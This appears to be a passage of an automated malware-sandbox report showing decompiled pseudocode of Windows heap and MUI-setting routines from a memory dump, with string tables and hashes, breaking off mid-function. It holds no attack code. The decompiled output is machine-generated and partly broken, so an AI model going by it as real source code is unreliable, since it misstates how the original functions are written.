                                                                                      • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0186B53F
                                                                                      • Go determine why that thread has not released the critical section., xrefs: 0186B3C5
                                                                                      • *** A stack buffer overrun occurred in %ws:%s, xrefs: 0186B2F3
                                                                                      • The instruction at %p tried to %s , xrefs: 0186B4B6
                                                                                      • The resource is owned exclusively by thread %p, xrefs: 0186B374
                                                                                      • The critical section is owned by thread %p., xrefs: 0186B3B9
                                                                                      • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0186B323
                                                                                      • *** Inpage error in %ws:%s, xrefs: 0186B418
                                                                                      • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 0186B39B
                                                                                      • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0186B305
                                                                                      • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0186B314
                                                                                      • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0186B38F
                                                                                      • read from, xrefs: 0186B4AD, 0186B4B2
                                                                                      • *** An Access Violation occurred in %ws:%s, xrefs: 0186B48F
                                                                                      • an invalid address, %p, xrefs: 0186B4CF
                                                                                      • *** then kb to get the faulting stack, xrefs: 0186B51C
                                                                                      • The resource is owned shared by %d threads, xrefs: 0186B37E
                                                                                      • <unknown>, xrefs: 0186B27E, 0186B2D1, 0186B350, 0186B399, 0186B417, 0186B48E
                                                                                      • *** enter .cxr %p for the context, xrefs: 0186B50D
                                                                                      • This failed because of error %Ix., xrefs: 0186B446
                                                                                      • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0186B47D
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • API String ID: 0-108210295
                                                                                      • Opcode ID: 846527bda45371e738e0f21d3cb8078573a70c593b44450199543f5efe2f6397
                                                                                      • Instruction ID: c91575b8f9fb21429d81f43f3b6998e677019f20a6a5406aad2e712c6c4b3e2b
                                                                                      • Opcode Fuzzy Hash: 846527bda45371e738e0f21d3cb8078573a70c593b44450199543f5efe2f6397
                                                                                      • Instruction Fuzzy Hash: 588156B1B00204FFDB319A4ADC95DBF7B69EF96759F800158F604EB112D6608741CBB2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 44%
                                                                                      			E01871C06() {
                                                                                      				signed int _t27;
                                                                                      				char* _t104;
                                                                                      				char* _t105;
                                                                                      				intOrPtr _t113;
                                                                                      				intOrPtr _t115;
                                                                                      				intOrPtr _t117;
                                                                                      				intOrPtr _t119;
                                                                                      				intOrPtr _t120;
                                                                                      
                                                                                      				_t105 = 0x17948a4;
                                                                                      				_t104 = "HEAP: ";
                                                                                      				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                      					_push(_t104);
                                                                                      					E017BB150();
                                                                                      				} else {
                                                                                      					E017BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                      				}
                                                                                      				_push( *0x18a589c);
                                                                                      				E017BB150("Heap error detected at %p (heap handle %p)\n",  *0x18a58a0);
                                                                                      				_t27 =  *0x18a5898; // 0x0
                                                                                      				if(_t27 <= 0xf) {
                                                                                      					switch( *((intOrPtr*)(_t27 * 4 +  &M01871E96))) {
                                                                                      						case 0:
                                                                                      							_t105 = "heap_failure_internal";
                                                                                      							goto L21;
                                                                                      						case 1:
                                                                                      							goto L21;
                                                                                      						case 2:
                                                                                      							goto L21;
                                                                                      						case 3:
                                                                                      							goto L21;
                                                                                      						case 4:
                                                                                      							goto L21;
                                                                                      						case 5:
                                                                                      							goto L21;
                                                                                      						case 6:
                                                                                      							goto L21;
                                                                                      						case 7:
                                                                                      							goto L21;
                                                                                      						case 8:
                                                                                      							goto L21;
                                                                                      						case 9:
                                                                                      							goto L21;
                                                                                      						case 0xa:
                                                                                      							goto L21;
                                                                                      						case 0xb:
                                                                                      							goto L21;
                                                                                      						case 0xc:
                                                                                      							goto L21;
                                                                                      						case 0xd:
                                                                                      							goto L21;
                                                                                      						case 0xe:
                                                                                      							goto L21;
                                                                                      						case 0xf:
                                                                                      							goto L21;
                                                                                      					}
                                                                                      				}
                                                                                      				L21:
                                                                                      				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                      					_push(_t104);
                                                                                      					E017BB150();
                                                                                      				} else {
                                                                                      					E017BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                      				}
                                                                                      				_push(_t105);
                                                                                      				E017BB150("Error code: %d - %s\n",  *0x18a5898);
                                                                                      				_t113 =  *0x18a58a4; // 0x0
                                                                                      				if(_t113 != 0) {
                                                                                      					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                      						_push(_t104);
                                                                                      						E017BB150();
                                                                                      					} else {
                                                                                      						E017BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                      					}
                                                                                      					E017BB150("Parameter1: %p\n",  *0x18a58a4);
                                                                                      				}
                                                                                      				_t115 =  *0x18a58a8; // 0x0
                                                                                      				if(_t115 != 0) {
                                                                                      					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                      						_push(_t104);
                                                                                      						E017BB150();
                                                                                      					} else {
                                                                                      						E017BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                      					}
                                                                                      					E017BB150("Parameter2: %p\n",  *0x18a58a8);
                                                                                      				}
                                                                                      				_t117 =  *0x18a58ac; // 0x0
                                                                                      				if(_t117 != 0) {
                                                                                      					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                      						_push(_t104);
                                                                                      						E017BB150();
                                                                                      					} else {
                                                                                      						E017BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                      					}
                                                                                      					E017BB150("Parameter3: %p\n",  *0x18a58ac);
                                                                                      				}
                                                                                      				_t119 =  *0x18a58b0; // 0x0
                                                                                      				if(_t119 != 0) {
                                                                                      					L41:
                                                                                      					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                      						_push(_t104);
                                                                                      						E017BB150();
                                                                                      					} else {
                                                                                      						E017BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                      					}
                                                                                      					_push( *0x18a58b4);
                                                                                      					E017BB150("Last known valid blocks: before - %p, after - %p\n",  *0x18a58b0);
                                                                                      				} else {
                                                                                      					_t120 =  *0x18a58b4; // 0x0
                                                                                      					if(_t120 != 0) {
                                                                                      						goto L41;
                                                                                      					}
                                                                                      				}
                                                                                      				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                      					_push(_t104);
                                                                                      					E017BB150();
                                                                                      				} else {
                                                                                      					E017BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                      				}
                                                                                      				return E017BB150("Stack trace available at %p\n", 0x18a58c0);
                                                                                      			}












                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                                                      • API String ID: 0-2897834094
                                                                                      • Opcode ID: 87edececd02c91c3980d13aac3944e6d1d8ca9d7e4e4e3bd3a541ed8d3c5f9aa
                                                                                      • Instruction ID: 93a618daeb3c70b22edd3d28f1908a0f68b43e2451dec82cf416f24f681170a8
                                                                                      • Opcode Fuzzy Hash: 87edececd02c91c3980d13aac3944e6d1d8ca9d7e4e4e3bd3a541ed8d3c5f9aa
                                                                                      • Instruction Fuzzy Hash: 5861F933529149DFD721AB89D4DDE25F7A8E744B30749813EF9099BB01DB24DE808F4A
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 96%
                                                                                      			E017C3D34(signed int* __ecx) {
                                                                                      				signed int* _v8;
                                                                                      				char _v12;
                                                                                      				signed int* _v16;
                                                                                      				signed int* _v20;
                                                                                      				char _v24;
                                                                                      				signed int _v28;
                                                                                      				signed int _v32;
                                                                                      				char _v36;
                                                                                      				signed int _v40;
                                                                                      				signed int _v44;
                                                                                      				signed int* _v48;
                                                                                      				signed int* _v52;
                                                                                      				signed int _v56;
                                                                                      				signed int _v60;
                                                                                      				char _v68;
                                                                                      				signed int _t140;
                                                                                      				signed int _t161;
                                                                                      				signed int* _t236;
                                                                                      				signed int* _t242;
                                                                                      				signed int* _t243;
                                                                                      				signed int* _t244;
                                                                                      				signed int* _t245;
                                                                                      				signed int _t255;
                                                                                      				void* _t257;
                                                                                      				signed int _t260;
                                                                                      				void* _t262;
                                                                                      				signed int _t264;
                                                                                      				void* _t267;
                                                                                      				signed int _t275;
                                                                                      				signed int* _t276;
                                                                                      				short* _t277;
                                                                                      				signed int* _t278;
                                                                                      				signed int* _t279;
                                                                                      				signed int* _t280;
                                                                                      				short* _t281;
                                                                                      				signed int* _t282;
                                                                                      				short* _t283;
                                                                                      				signed int* _t284;
                                                                                      				void* _t285;
                                                                                      
                                                                                      				_v60 = _v60 | 0xffffffff;
                                                                                      				_t280 = 0;
                                                                                      				_t242 = __ecx;
                                                                                      				_v52 = __ecx;
                                                                                      				_v8 = 0;
                                                                                      				_v20 = 0;
                                                                                      				_v40 = 0;
                                                                                      				_v28 = 0;
                                                                                      				_v32 = 0;
                                                                                      				_v44 = 0;
                                                                                      				_v56 = 0;
                                                                                      				_t275 = 0;
                                                                                      				_v16 = 0;
                                                                                      				if(__ecx == 0) {
                                                                                      					_t280 = 0xc000000d;
                                                                                      					_t140 = 0;
                                                                                      					L50:
                                                                                      					 *_t242 =  *_t242 | 0x00000800;
                                                                                      					_t242[0x13] = _t140;
                                                                                      					_t242[0x16] = _v40;
                                                                                      					_t242[0x18] = _v28;
                                                                                      					_t242[0x14] = _v32;
                                                                                      					_t242[0x17] = _t275;
                                                                                      					_t242[0x15] = _v44;
                                                                                      					_t242[0x11] = _v56;
                                                                                      					_t242[0x12] = _v60;
                                                                                      					return _t280;
                                                                                      				}
                                                                                      				if(E017C1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
                                                                                      					_v56 = 1;
                                                                                      					if(_v8 != 0) {
                                                                                      						L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
                                                                                      					}
                                                                                      					_v8 = _t280;
                                                                                      				}
                                                                                      				if(E017C1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
                                                                                      					_v60 =  *_v8;
                                                                                      					L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
                                                                                      					_v8 = _t280;
                                                                                      				}
                                                                                      				if(E017C1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
                                                                                      					L16:
                                                                                      					if(E017C1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
                                                                                      						L28:
                                                                                      						if(E017C1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
                                                                                      							L46:
                                                                                      							_t275 = _v16;
                                                                                      							L47:
                                                                                      							_t161 = 0;
                                                                                      							L48:
                                                                                      							if(_v8 != 0) {
                                                                                      								L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
                                                                                      							}
                                                                                      							_t140 = _v20;
                                                                                      							if(_t140 != 0) {
                                                                                      								if(_t275 != 0) {
                                                                                      									L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
                                                                                      									_t275 = 0;
                                                                                      									_v28 = 0;
                                                                                      									_t140 = _v20;
                                                                                      								}
                                                                                      							}
                                                                                      							goto L50;
                                                                                      						}
                                                                                      						_t167 = _v12;
                                                                                      						_t255 = _v12 + 4;
                                                                                      						_v44 = _t255;
                                                                                      						if(_t255 == 0) {
                                                                                      							_t276 = _t280;
                                                                                      							_v32 = _t280;
                                                                                      						} else {
                                                                                      							_t276 = L017D4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
                                                                                      							_t167 = _v12;
                                                                                      							_v32 = _t276;
                                                                                      						}
                                                                                      						if(_t276 == 0) {
                                                                                      							_v44 = _t280;
                                                                                      							_t280 = 0xc0000017;
                                                                                      							goto L46;
                                                                                      						} else {
                                                                                      							E017FF3E0(_t276, _v8, _t167);
                                                                                      							_v48 = _t276;
                                                                                      							_t277 = E01801370(_t276, 0x1794e90);
                                                                                      							_pop(_t257);
                                                                                      							if(_t277 == 0) {
                                                                                      								L38:
                                                                                      								_t170 = _v48;
                                                                                      								if( *_v48 != 0) {
                                                                                      									E017FBB40(0,  &_v68, _t170);
                                                                                      									if(L017C43C0( &_v68,  &_v24) != 0) {
                                                                                      										_t280 =  &(_t280[0]);
                                                                                      									}
                                                                                      								}
                                                                                      								if(_t280 == 0) {
                                                                                      									_t280 = 0;
                                                                                      									L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
                                                                                      									_v44 = 0;
                                                                                      									_v32 = 0;
                                                                                      								} else {
                                                                                      									_t280 = 0;
                                                                                      								}
                                                                                      								_t174 = _v8;
                                                                                      								if(_v8 != 0) {
                                                                                      									L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
                                                                                      								}
                                                                                      								_v8 = _t280;
                                                                                      								goto L46;
                                                                                      							}
                                                                                      							_t243 = _v48;
                                                                                      							do {
                                                                                      								 *_t277 = 0;
                                                                                      								_t278 = _t277 + 2;
                                                                                      								E017FBB40(_t257,  &_v68, _t243);
                                                                                      								if(L017C43C0( &_v68,  &_v24) != 0) {
                                                                                      									_t280 =  &(_t280[0]);
                                                                                      								}
                                                                                      								_t243 = _t278;
                                                                                      								_t277 = E01801370(_t278, 0x1794e90);
                                                                                      								_pop(_t257);
                                                                                      							} while (_t277 != 0);
                                                                                      							_v48 = _t243;
                                                                                      							_t242 = _v52;
                                                                                      							goto L38;
                                                                                      						}
                                                                                      					}
                                                                                      					_t191 = _v12;
                                                                                      					_t260 = _v12 + 4;
                                                                                      					_v28 = _t260;
                                                                                      					if(_t260 == 0) {
                                                                                      						_t275 = _t280;
                                                                                      						_v16 = _t280;
                                                                                      					} else {
                                                                                      						_t275 = L017D4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
                                                                                      						_t191 = _v12;
                                                                                      						_v16 = _t275;
                                                                                      					}
                                                                                      					if(_t275 == 0) {
                                                                                      						_v28 = _t280;
                                                                                      						_t280 = 0xc0000017;
                                                                                      						goto L47;
                                                                                      					} else {
                                                                                      						E017FF3E0(_t275, _v8, _t191);
                                                                                      						_t285 = _t285 + 0xc;
                                                                                      						_v48 = _t275;
                                                                                      						_t279 = _t280;
                                                                                      						_t281 = E01801370(_v16, 0x1794e90);
                                                                                      						_pop(_t262);
                                                                                      						if(_t281 != 0) {
                                                                                      							_t244 = _v48;
                                                                                      							do {
                                                                                      								 *_t281 = 0;
                                                                                      								_t282 = _t281 + 2;
                                                                                      								E017FBB40(_t262,  &_v68, _t244);
                                                                                      								if(L017C43C0( &_v68,  &_v24) != 0) {
                                                                                      									_t279 =  &(_t279[0]);
                                                                                      								}
                                                                                      								_t244 = _t282;
                                                                                      								_t281 = E01801370(_t282, 0x1794e90);
                                                                                      								_pop(_t262);
                                                                                      							} while (_t281 != 0);
                                                                                      							_v48 = _t244;
                                                                                      							_t242 = _v52;
                                                                                      						}
                                                                                      						_t201 = _v48;
                                                                                      						_t280 = 0;
                                                                                      						if( *_v48 != 0) {
                                                                                      							E017FBB40(_t262,  &_v68, _t201);
                                                                                      							if(L017C43C0( &_v68,  &_v24) != 0) {
                                                                                      								_t279 =  &(_t279[0]);
                                                                                      							}
                                                                                      						}
                                                                                      						if(_t279 == 0) {
                                                                                      							L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
                                                                                      							_v28 = _t280;
                                                                                      							_v16 = _t280;
                                                                                      						}
                                                                                      						_t202 = _v8;
                                                                                      						if(_v8 != 0) {
                                                                                      							L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
                                                                                      						}
                                                                                      						_v8 = _t280;
                                                                                      						goto L28;
                                                                                      					}
                                                                                      				}
                                                                                      				_t214 = _v12;
                                                                                      				_t264 = _v12 + 4;
                                                                                      				_v40 = _t264;
                                                                                      				if(_t264 == 0) {
                                                                                      					_v20 = _t280;
                                                                                      				} else {
                                                                                      					_t236 = L017D4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
                                                                                      					_t280 = _t236;
                                                                                      					_v20 = _t236;
                                                                                      					_t214 = _v12;
                                                                                      				}
                                                                                      				if(_t280 == 0) {
                                                                                      					_t161 = 0;
                                                                                      					_t280 = 0xc0000017;
                                                                                      					_v40 = 0;
                                                                                      					goto L48;
                                                                                      				} else {
                                                                                      					E017FF3E0(_t280, _v8, _t214);
                                                                                      					_t285 = _t285 + 0xc;
                                                                                      					_v48 = _t280;
                                                                                      					_t283 = E01801370(_t280, 0x1794e90);
                                                                                      					_pop(_t267);
                                                                                      					if(_t283 != 0) {
                                                                                      						_t245 = _v48;
                                                                                      						do {
                                                                                      							 *_t283 = 0;
                                                                                      							_t284 = _t283 + 2;
                                                                                      							E017FBB40(_t267,  &_v68, _t245);
                                                                                      							if(L017C43C0( &_v68,  &_v24) != 0) {
                                                                                      								_t275 = _t275 + 1;
                                                                                      							}
                                                                                      							_t245 = _t284;
                                                                                      							_t283 = E01801370(_t284, 0x1794e90);
                                                                                      							_pop(_t267);
                                                                                      						} while (_t283 != 0);
                                                                                      						_v48 = _t245;
                                                                                      						_t242 = _v52;
                                                                                      					}
                                                                                      					_t224 = _v48;
                                                                                      					_t280 = 0;
                                                                                      					if( *_v48 != 0) {
                                                                                      						E017FBB40(_t267,  &_v68, _t224);
                                                                                      						if(L017C43C0( &_v68,  &_v24) != 0) {
                                                                                      							_t275 = _t275 + 1;
                                                                                      						}
                                                                                      					}
                                                                                      					if(_t275 == 0) {
                                                                                      						L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
                                                                                      						_v40 = _t280;
                                                                                      						_v20 = _t280;
                                                                                      					}
                                                                                      					_t225 = _v8;
                                                                                      					if(_v8 != 0) {
                                                                                      						L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
                                                                                      					}
                                                                                      					_v8 = _t280;
                                                                                      					goto L16;
                                                                                      				}
                                                                                      			}










































                                                                                      0x00000000
                                                                                      0x017c3e91

                                                                                      Strings
                                                                                      • Kernel-MUI-Language-Allowed, xrefs: 017C3DC0
                                                                                      • Kernel-MUI-Language-Disallowed, xrefs: 017C3E97
                                                                                      • Kernel-MUI-Language-SKU, xrefs: 017C3F70
                                                                                      • Kernel-MUI-Number-Allowed, xrefs: 017C3D8C
                                                                                      • WindowsExcludedProcs, xrefs: 017C3D6F
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                      • API String ID: 0-258546922
                                                                                      • Opcode ID: 2aa3c55cc93e1c966c0547dcef29386fba833f41c7e9cc48169b3896fc823690
                                                                                      • Instruction ID: f55fdb2a58fb8b1e7959f2632a89503792fff84fb9a22ced9f178f90ce2bf664
                                                                                      • Opcode Fuzzy Hash: 2aa3c55cc93e1c966c0547dcef29386fba833f41c7e9cc48169b3896fc823690
                                                                                      • Instruction Fuzzy Hash: 47F12972D00619EBCB16DF98C984AEEFBB9FF48B50F15406EE906E7254D7349A018B90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 29%
                                                                                      			E017B40E1(void* __edx) {
                                                                                      				void* _t19;
                                                                                      				void* _t29;
                                                                                      
                                                                                      				_t28 = _t19;
                                                                                      				_t29 = __edx;
                                                                                      				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
                                                                                      					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                      						_push("HEAP: ");
                                                                                      						E017BB150();
                                                                                      					} else {
                                                                                      						E017BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                      					}
                                                                                      					E017BB150("Invalid heap signature for heap at %p", _t28);
                                                                                      					if(_t29 != 0) {
                                                                                      						E017BB150(", passed to %s", _t29);
                                                                                      					}
                                                                                      					_push("\n");
                                                                                      					E017BB150();
                                                                                      					if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                                                                      						 *0x18a6378 = 1;
                                                                                      						asm("int3");
                                                                                      						 *0x18a6378 = 0;
                                                                                      					}
                                                                                      					return 0;
                                                                                      				}
                                                                                      				return 1;
                                                                                      			}






                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
                                                                                      • API String ID: 0-188067316
                                                                                      • Opcode ID: 81d49f05fbfd9a41b419d35d463ae7d92146cef047fc31aeec3af1b2fbc8e1b8
                                                                                      • Instruction ID: 18192cead553a2258360aff1eafa523643c789eb9ae874ce605ba16e66e44091
                                                                                      • Opcode Fuzzy Hash: 81d49f05fbfd9a41b419d35d463ae7d92146cef047fc31aeec3af1b2fbc8e1b8
                                                                                      • Instruction Fuzzy Hash: D40128331402459EE325976DF8DEF92F7ACDB00B34F28806EF409876499BA89584C614
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 70%
                                                                                      			E017DA830(intOrPtr __ecx, signed int __edx, signed short _a4) {
                                                                                      				void* _v5;
                                                                                      				signed short _v12;
                                                                                      				intOrPtr _v16;
                                                                                      				signed int _v20;
                                                                                      				signed short _v24;
                                                                                      				signed short _v28;
                                                                                      				signed int _v32;
                                                                                      				signed short _v36;
                                                                                      				signed int _v40;
                                                                                      				intOrPtr _v44;
                                                                                      				intOrPtr _v48;
                                                                                      				signed short* _v52;
                                                                                      				void* __ebx;
                                                                                      				void* __edi;
                                                                                      				void* __ebp;
                                                                                      				signed int _t131;
                                                                                      				signed char _t134;
                                                                                      				signed int _t138;
                                                                                      				char _t141;
                                                                                      				signed short _t142;
                                                                                      				void* _t146;
                                                                                      				signed short _t147;
                                                                                      				intOrPtr* _t149;
                                                                                      				intOrPtr _t156;
                                                                                      				signed int _t167;
                                                                                      				signed int _t168;
                                                                                      				signed short* _t173;
                                                                                      				signed short _t174;
                                                                                      				intOrPtr* _t182;
                                                                                      				signed short _t184;
                                                                                      				intOrPtr* _t187;
                                                                                      				intOrPtr _t197;
                                                                                      				intOrPtr _t206;
                                                                                      				intOrPtr _t210;
                                                                                      				signed short _t211;
                                                                                      				intOrPtr* _t212;
                                                                                      				signed short _t214;
                                                                                      				signed int _t216;
                                                                                      				intOrPtr _t217;
                                                                                      				signed char _t225;
                                                                                      				signed short _t235;
                                                                                      				signed int _t237;
                                                                                      				intOrPtr* _t238;
                                                                                      				signed int _t242;
                                                                                      				unsigned int _t245;
                                                                                      				signed int _t251;
                                                                                      				intOrPtr* _t252;
                                                                                      				signed int _t253;
                                                                                      				intOrPtr* _t255;
                                                                                      				signed int _t256;
                                                                                      				void* _t257;
                                                                                      				void* _t260;
                                                                                      
                                                                                      				_t256 = __edx;
                                                                                      				_t206 = __ecx;
                                                                                      				_t235 = _a4;
                                                                                      				_v44 = __ecx;
                                                                                      				_v24 = _t235;
                                                                                      				if(_t235 == 0) {
                                                                                      					L41:
                                                                                      					return _t131;
                                                                                      				}
                                                                                      				_t251 = ( *(__edx + 4) ^  *(__ecx + 0x54)) & 0x0000ffff;
                                                                                      				if(_t251 == 0) {
                                                                                      					__eflags =  *0x18a8748 - 1;
                                                                                      					if( *0x18a8748 >= 1) {
                                                                                      						__eflags =  *(__edx + 2) & 0x00000008;
                                                                                      						if(( *(__edx + 2) & 0x00000008) == 0) {
                                                                                      							_t110 = _t256 + 0xfff; // 0xfe7
                                                                                      							__eflags = (_t110 & 0xfffff000) - __edx;
                                                                                      							if((_t110 & 0xfffff000) != __edx) {
                                                                                      								_t197 =  *[fs:0x30];
                                                                                      								__eflags =  *(_t197 + 0xc);
                                                                                      								if( *(_t197 + 0xc) == 0) {
                                                                                      									_push("HEAP: ");
                                                                                      									E017BB150();
                                                                                      									_t260 = _t257 + 4;
                                                                                      								} else {
                                                                                      									E017BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                      									_t260 = _t257 + 8;
                                                                                      								}
                                                                                      								_push("((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))");
                                                                                      								E017BB150();
                                                                                      								_t257 = _t260 + 4;
                                                                                      								__eflags =  *0x18a7bc8;
                                                                                      								if(__eflags == 0) {
                                                                                      									E01872073(_t206, 1, _t251, __eflags);
                                                                                      								}
                                                                                      								_t235 = _v24;
                                                                                      							}
                                                                                      						}
                                                                                      					}
                                                                                      				}
                                                                                      				_t134 =  *((intOrPtr*)(_t256 + 6));
                                                                                      				if(_t134 == 0) {
                                                                                      					_t210 = _t206;
                                                                                      					_v48 = _t206;
                                                                                      				} else {
                                                                                      					_t210 = (_t256 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
                                                                                      					_v48 = _t210;
                                                                                      				}
                                                                                      				_v5 =  *(_t256 + 2);
                                                                                      				do {
                                                                                      					if(_t235 > 0xfe00) {
                                                                                      						_v12 = 0xfe00;
                                                                                      						__eflags = _t235 - 0xfe01;
                                                                                      						if(_t235 == 0xfe01) {
                                                                                      							_v12 = 0xfdf0;
                                                                                      						}
                                                                                      						_t138 = 0;
                                                                                      					} else {
                                                                                      						_v12 = _t235 & 0x0000ffff;
                                                                                      						_t138 = _v5;
                                                                                      					}
                                                                                      					 *(_t256 + 2) = _t138;
                                                                                      					 *(_t256 + 4) =  *(_t206 + 0x54) ^ _t251;
                                                                                      					_t236 =  *((intOrPtr*)(_t210 + 0x18));
                                                                                      					if( *((intOrPtr*)(_t210 + 0x18)) == _t210) {
                                                                                      						_t141 = 0;
                                                                                      					} else {
                                                                                      						_t141 = (_t256 - _t210 >> 0x10) + 1;
                                                                                      						_v40 = _t141;
                                                                                      						if(_t141 >= 0xfe) {
                                                                                      							_push(_t210);
                                                                                      							E0187A80D(_t236, _t256, _t210, 0);
                                                                                      							_t141 = _v40;
                                                                                      						}
                                                                                      					}
                                                                                      					 *(_t256 + 2) =  *(_t256 + 2) & 0x000000f0;
                                                                                      					 *((char*)(_t256 + 6)) = _t141;
                                                                                      					_t142 = _v12;
                                                                                      					 *_t256 = _t142;
                                                                                      					 *(_t256 + 3) = 0;
                                                                                      					_t211 = _t142 & 0x0000ffff;
                                                                                      					 *((char*)(_t256 + 7)) = 0;
                                                                                      					_v20 = _t211;
                                                                                      					if(( *(_t206 + 0x40) & 0x00000040) != 0) {
                                                                                      						_t119 = _t256 + 0x10; // -8
                                                                                      						E0180D5E0(_t119, _t211 * 8 - 0x10, 0xfeeefeee);
                                                                                      						 *(_t256 + 2) =  *(_t256 + 2) | 0x00000004;
                                                                                      						_t211 = _v20;
                                                                                      					}
                                                                                      					_t252 =  *((intOrPtr*)(_t206 + 0xb4));
                                                                                      					if(_t252 == 0) {
                                                                                      						L56:
                                                                                      						_t212 =  *((intOrPtr*)(_t206 + 0xc0));
                                                                                      						_t146 = _t206 + 0xc0;
                                                                                      						goto L19;
                                                                                      					} else {
                                                                                      						if(_t211 <  *((intOrPtr*)(_t252 + 4))) {
                                                                                      							L15:
                                                                                      							_t185 = _t211;
                                                                                      							goto L17;
                                                                                      						} else {
                                                                                      							while(1) {
                                                                                      								_t187 =  *_t252;
